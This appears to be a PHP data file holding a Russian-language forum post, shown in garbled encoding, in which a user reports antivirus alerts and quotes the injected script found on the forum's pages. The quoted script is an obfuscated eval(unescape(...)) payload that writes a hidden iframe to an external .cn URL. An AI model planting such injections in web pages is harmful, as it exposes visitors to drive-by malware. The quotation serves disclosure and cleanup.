<?php

$psubject="Ќа форуме вирус!";
$pcontent="—корее всего не туда запостил...просто нет времени искать нужную ветку...
” мен€ [b]DrWeb[/b] ругаетьс€ на каждую страницу форума
[b]infected with Exploit.IFrame.38[/b]
ѕроверив страницы в карантине действительно присутсвует большое количество Ёксплоитов в каждой (20-50 штук на страницу)
[quote]&#60;script type=&#34;text/javascript&#34;&#62;
eval(unescape(&#34;%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%5C%75%30%30%33%63%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%32%5C%75%30%30%36%33%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%36%38%5C%75%30%30%37%34%5C%75%30%30%37%34%5C%75%30%30%37%30%5C%75%30%30%33%61%5C%75%30%30%32%66%5C%75%30%30%32%66%5C%75%30%30%36%66%5C%75%30%30%37%32%5C%75%30%30%36%35%5C%75%30%30%36%65%5C%75%30%30%37%34%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%36%5C%75%30%30%36%36%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%65%5C%75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30%36%65%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%37%5C%75%30%30%36%39%5C%75%30%30%33%66%5C%75%30%30%33%31%5C%75%30%30%33%33%5C%75%30%30%32%32%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%34%5C%75%30%30%37%39%5C%75%30%30%36%63%5C%75%30%30%36%35%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%37%36%5C%75%30%30%36%39%5C%75%30%30%37%33%5C%75%30%30%36%39%5C%75%30%30%36%32%5C%75%30%30%36%39%5C%75%30%30%36%63%5C%75%30%30%36%39%5C%75%30%30%37%34%5C%75%30%30%37%39%5C%75%30%30%33%61%5C%75%30%30%32%30%5C%75%30%30%36%38%5C%75%30%30%36%39%5C%75%30%30%36%34%5C%75%30%30%36%34%5C%75%30%30%36%35%5C%75%30%30%36%65%5C%75%30%30%33%62%5C%75%30%30%32%30%5C%75%30%30%36%34%5C%75%30%30%36%39%5C%75%30%30%37%33%5C%75%30%30%37%30%5C%75%30%30%36%63%5C%75%30%30%36%31%5C%75%30%30%37%39%5C%75%30%30%33%61%5C%75%30%30%32%30%5C%75%30%30%36%65%5C%75%30%30%36%66%5C%75%30%30%36%65%5C%75%30%30%36%35%5C%75%30%30%32%32%5C%75%30%30%33%65%5C%75%30%30%33%63%5C%75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%33%65%27%29%3B&#34;));
&#60;/script&#62;[/quote]
ћне это конечно не страшно, но лучше почистить.";
$pauthor="SkyRE";
$pdate="1213862142";
$plastdate="1213931559";
$pimage="4.gif";
$plastreply="1";
$plastauthor="WiredPlane";
$preplies="1";
$pviews="10";
$pnotify="|SkyRE";
$plock="";
$pip="";
$pvisitors="|WiredPlane";
$psticky="";

?>